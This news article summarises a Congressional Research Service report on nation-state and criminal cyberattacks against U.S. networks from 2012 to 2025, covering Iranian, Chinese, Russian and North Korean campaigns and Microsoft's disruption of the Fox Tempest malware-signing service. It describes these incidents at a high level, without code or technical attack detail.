Iranian state-sponsored cyber activity continues to rank among the most persistent threats facing U.S. networks and critical infrastructure, according to a Congressional Research Service report examining major cyberattacks attributed to nation-state actors between 2012 and 2025. The report identifies Iran as one of the leading cyber adversaries tracked by U.S. intelligence agencies, alongside China, Russia, and North Korea, with campaigns targeting sectors ranging from telecommunications and defense to energy and industrial control environments.
Among the incidents cited are operations linked to Iran’s Islamic Revolutionary Guard Corps (IRGC)-affiliated CyberAveng3rs group, which targeted ICS (industrial control systems), including PLCs (programmable logic controllers) used in critical infrastructure sectors such as water and wastewater systems.
The CRS analysis also highlights how Iranian government-sponsored actors have repeatedly exploited known software vulnerabilities and weakly secured systems to gain footholds inside U.S. critical infrastructure networks. In one campaign referenced by the report, Iranian actors exploited vulnerabilities in Microsoft Exchange and Fortinet products to access critical infrastructure organizations, later conducting data theft, ransomware, encryption, and extortion operations.
The report warns that attribution remains difficult because state-backed actors frequently obscure their operations and rotate infrastructure, but notes that cyber operations tied to Iran increasingly combine espionage, disruption, and financially motivated tactics against both public- and private-sector targets.
“Nation-states are some of the most sophisticated actors that conduct cyberattacks. The Director of National Intelligence is required to provide Congress an annual assessment from the intelligence community on worldwide threats,” the CRS wrote in its report updated this week. “Recent assessments have highlighted cyberspace as an area of strategic concern, with the People’s Republic of China, the Russian Federation, the Democratic People’s Republic of Korea (North Korea), and the Islamic Republic of Iran as the leading threat actors.”
It added that attacks from these countries include spying on government agencies by accessing agency computers, stealing sensitive information from public and private-sector entities in the U.S., stealing intellectual property, and destroying or potentially destroying computer equipment.
“Nation-states may also direct private entities or criminal groups to carry out attacks to meet the goals of the country,” the CRS reported. “Cyber criminals are less resourced than nation-state actors and are less likely to employ novel and cutting-edge techniques in campaigns, yet their attacks are often highly effective. Most criminals are financially motivated and use cyberspace as a medium for conducting profit-bearing schemes. However, gaining money is not a requirement for illicit activity. Cyberattacks against victims in the United States from actors located abroad include compromising computers to create and maintain botnets, business email compromise schemes, hack and release campaigns, and ransomware attacks.”
The Director of National Intelligence is required to provide Congress with an annual intelligence community assessment of worldwide threats. Recent assessments identify cyberspace as a growing strategic concern, with China, Russia, North Korea, and Iran consistently identified as the leading state-backed cyber threat actors.
The CRS review outlines selected cyberattack campaigns against the U.S. between 2012 and 2025 that were attributed to nation-states or actors operating on their behalf. The country of residence for the perpetrator is included for each cyberattack campaign to highlight the geographic diversity of the attack origins. Some campaigns were perpetrated by criminal groups and others by individuals.
Moreover, the U.S. government determined that these actors were not operating to benefit the state but were acting for personal gain, distinguishing these attacks from those listed. These attacks include the compromise of computers to create and maintain botnets, business email compromise schemes, hack-and-release campaigns, and ransomware attacks.
The incidents include espionage targeting government agencies, theft of sensitive public- and private-sector data, intellectual property theft designed to benefit domestic industries, and operations intended to disrupt or damage computer systems and critical infrastructure. The review of these campaigns shows that state-sponsored cyber operations increasingly focus on critical infrastructure, telecommunications providers, defense contractors, healthcare organizations, and internet-connected systems.
The report identifies China, Russia, Iran, and North Korea as most active state-linked cyber actors behind espionage, disruption, ransomware, credential theft, and infrastructure compromise campaigns. Among the recent incidents cited are China-linked Salt Typhoon and Volt Typhoon operations, which targeted U.S. telecommunications companies and critical infrastructure environments. According to the report, Volt Typhoon actors compromised critical infrastructure systems to establish persistent access that could later be used to disrupt services if directed to do so, while Salt Typhoon actors infiltrated commercial telecommunications infrastructure to steal customer communications.
The report also highlights how Iran-linked cyber operations increasingly focus on OT (operational technology) and ICS systems. One 2022 campaign attributed to Iran’s IRGC-affiliated CyberAveng3rs group targeted ICS systems used in critical infrastructure sectors, including water and wastewater facilities.
Another Iran-linked operation exploited Log4Shell vulnerabilities in network connection software to deploy cryptocurrency mining tools and harvest credentials from compromised federal networks. The findings underscore broader concerns that nation-state cyber actors continue to exploit weak authentication practices, exposed internet-connected devices, software vulnerabilities, and supply chain trust relationships to gain long-term access into sensitive environments.
Russian cyber operations documented in the report span espionage, destructive attacks, ransomware, and supply chain compromises. The CRS table references campaigns including APT-28, Star Blizzard, Snake malware, and APT-29. Russian state-linked actors were accused of targeting logistics and technology companies supporting Ukraine, conducting long-term surveillance operations against NATO countries, exploiting multi-factor authentication misconfigurations to steal data, and infiltrating IT providers through trusted supply chain relationships.
The CRS report also references the Cyber Army of Russia Reborn campaign, which was tied to cyberattacks and distributed denial-of-service attacks against critical infrastructure organizations.
North Korean cyber activity described in the report combined financial crime with espionage and ransomware operations. Campaigns linked to North Korean actors targeted healthcare organizations with ransomware, used spear-phishing for intelligence collection, and infiltrated blockchain and cryptocurrency companies to steal funds.
The report also documents schemes in which North Korean operatives posed as remote IT workers to generate revenue for state programs. Separately, criminal cyber activity cited in the CRS review included ransomware campaigns such as REvil, Phobos, LockerGoga, MegaCortex, and NeFilim, alongside attacks involving botnets, credential theft, crypto laundering, and DDoS-for-hire services.
The CRS compilation further shows how cyber campaigns increasingly blur the lines between state-sponsored operations, financially motivated cybercrime, and hybrid influence activity. Examples cited in the report include the 2024 compromise of the U.S. Securities and Exchange Commission’s X account, which falsely announced approval of Bitcoin exchange-traded funds, as well as multiple ransomware and credential-theft schemes operated from countries including Russia, Ukraine, Romania, Moldova, and Switzerland. Across the documented incidents, the report repeatedly points to the exploitation of trusted systems, internet-facing infrastructure, stolen credentials, and poorly secured connected devices as recurring enablers of modern cyber operations.
The report also recognized that most criminals are financially motivated and use cyberspace as a medium for conducting profit-bearing schemes. “However, financial gain is not a requirement for illicit activity. Some malicious actors also victimize entities online without desires for payment, such as in hack-and-leak operations intended to embarrass the victim.”
Earlier this week, Redmond, Washington-based Microsoft said that it disrupted Fox Tempest, a malware-signing-as-a-service operation that helped cybercriminals make malicious software appear legitimate by abusing Microsoft’s code-signing infrastructure. The service, active since May 2025, was linked to widespread infections and network compromises globally and was used by ransomware groups and malware operators tied to families including Qilin, Akira, Lumma Stealer, Vidar, and Oyster.
